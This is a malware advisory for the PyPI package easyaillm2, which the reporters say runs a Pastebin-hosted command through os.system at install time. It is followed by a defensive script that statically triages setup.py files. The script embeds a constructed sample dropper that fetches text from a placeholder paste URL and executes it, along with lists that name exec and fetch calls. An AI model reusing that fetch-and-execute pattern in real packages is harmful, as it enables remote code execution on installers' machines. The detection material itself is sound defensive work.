Malicious code in easyaillm2 (PyPI)
MAL-2026-5765
Description
Source: amazon-inspector (f532239be50513698758c81009444ff49bcf4a140fab11734107d81c4eab6684)
On pip install easyaillm2, setup.py fetches a raw text body from https://pastebin.com/raw/yBcUM1QB and passes the first line directly to os.system('cmd /c "..."'), executing whatever the mutable, anonymous Pastebin paste currently serves with the installer's privileges. There is no integrity check, no version pinning, and no relationship between the destination and any legitimate publisher. The package itself ships no module code (the source tree contains only egg-info), and its name/description mimic LLM-tooling naming (easyaillm2 / easyllama2) — the install-time Pastebin dropper is the package's only behavior. A Pastebin owner can swap the payload at any moment, turning every future pip install of this version into arbitrary remote code execution on the installer's machine.
Source: kam193 (44a9d76b87fed91bba537f979b2d6f63a7e1758c73424b2d3ffd47bffefe6761)
During installation, the code attempts to download and start a malicious executable.
Likely related to 2025-08-raknet-testing-package.
Category: MALICIOUS - The campaign has clearly malicious intent, such as infostealers.
Campaign: 2026-06-easyaillm
Reasons (based on the campaign):
- Downloads and executes a remote executable.
- obfuscation
- malware
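The pattern both sources describe (a setup.py that fetches remote text at import time and hands it to a shell) is cheap to triage statically before anything is installed. The script below is an added example written for this page; it is not code from the advisory, the reporters, or the package. It parses a setup.py with the standard-library ast module and flags module-level calls that fetch over the network, calls that execute a shell or process, and string literals pointing at paste sites. The SAMPLE_SETUP_PY and BENIGN_SETUP_PY strings are constructed to mirror the described behaviour for the demonstration; they are not the real easyaillm2 source, and the paste path "EXAMPLE" is a placeholder, not the URL from the advisory.

```python
"""Static triage of a setup.py for install-time dropper patterns (added example)."""
import ast
import re
from dataclasses import dataclass

# Constructed sample modelled on the advisory's description; NOT the real package.
SAMPLE_SETUP_PY = '''import os, urllib.request
from setuptools import setup

body = urllib.request.urlopen("https://pastebin.com/raw/EXAMPLE").read().decode()
os.system('cmd /c "' + body.splitlines()[0] + '"')

setup(name="example-pkg", version="0.0.1", packages=[])
'''

# Constructed benign control: only the setup() call at module level.
BENIGN_SETUP_PY = '''from setuptools import setup
setup(name="harmless", version="1.0", packages=["harmless"])
'''

# Dotted call names that pull content from the network at import time.
FETCH_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve", "urllib.urlopen",
    "requests.get", "requests.post", "httpx.get", "http.client.HTTPSConnection",
}
# Dotted call names that hand data to a shell, a new process or the interpreter.
EXEC_CALLS = {
    "os.system", "os.popen", "os.startfile", "os.execv", "os.execvp",
    "subprocess.run", "subprocess.call", "subprocess.check_call",
    "subprocess.check_output", "subprocess.Popen", "eval", "exec",
}
# Anonymous, mutable paste hosts: a payload there can change after publication.
PASTE_HOST_RE = re.compile(
    r"https?://(?:www\.)?(?:pastebin\.com|paste\.ee|hastebin\.com|rentry\.co)/", re.I)


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str    # "fetch", "exec" or "paste-url"
    detail: str


def _import_aliases(tree):
    """Map local names to qualified names so `from os import system as s` resolves."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _qualname(func, aliases):
    """Return the dotted target of a call, e.g. 'urllib.request.urlopen', or None."""
    parts, node = [], func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def triage_setup_py(source):
    """Collect fetch/exec/paste-url findings from statements that run on import."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = []
    for stmt in tree.body:
        # def/class bodies only run if called; everything else executes the
        # moment pip imports setup.py, which is what makes a dropper install-time.
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call):
                name = _qualname(node.func, aliases)
                if name in FETCH_CALLS:
                    findings.append(Finding(node.lineno, "fetch", name))
                elif name in EXEC_CALLS:
                    findings.append(Finding(node.lineno, "exec", name))
            elif isinstance(node, ast.Constant) and isinstance(node.value, str):
                if PASTE_HOST_RE.search(node.value):
                    findings.append(Finding(node.lineno, "paste-url", node.value))
    return findings


def verdict(findings):
    """'likely-dropper' when remote content can reach an exec sink at install time."""
    kinds = {f.kind for f in findings}
    if "exec" in kinds and ("fetch" in kinds or "paste-url" in kinds):
        return "likely-dropper"
    return "review" if kinds else "clean"


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        found = triage_setup_py(src)
        print(label, verdict(found))
        for f in found:
            print(f"  line {f.line}: {f.kind} {f.detail}")
```

To triage a real sdist, download the tarball directly from the PyPI files URL (with curl or a browser) and extract setup.py from it; do not use pip to obtain it, because pip's resolver builds metadata for sdists and may execute setup.py in the process, which is exactly the step the dropper relies on. The alias resolution matters in practice: `from os import system as run_cmd` or `import subprocess as sp` would slip past a plain grep for `os.system`.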
References
- EVIDENCE https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection
- EVIDENCE https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection
- EVIDENCE https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25
- WEB https://bad-packages.kam193.eu/pypi/package/easyaillm2
- PACKAGE https://pypi.org/project/easyaillm2/2.0.68/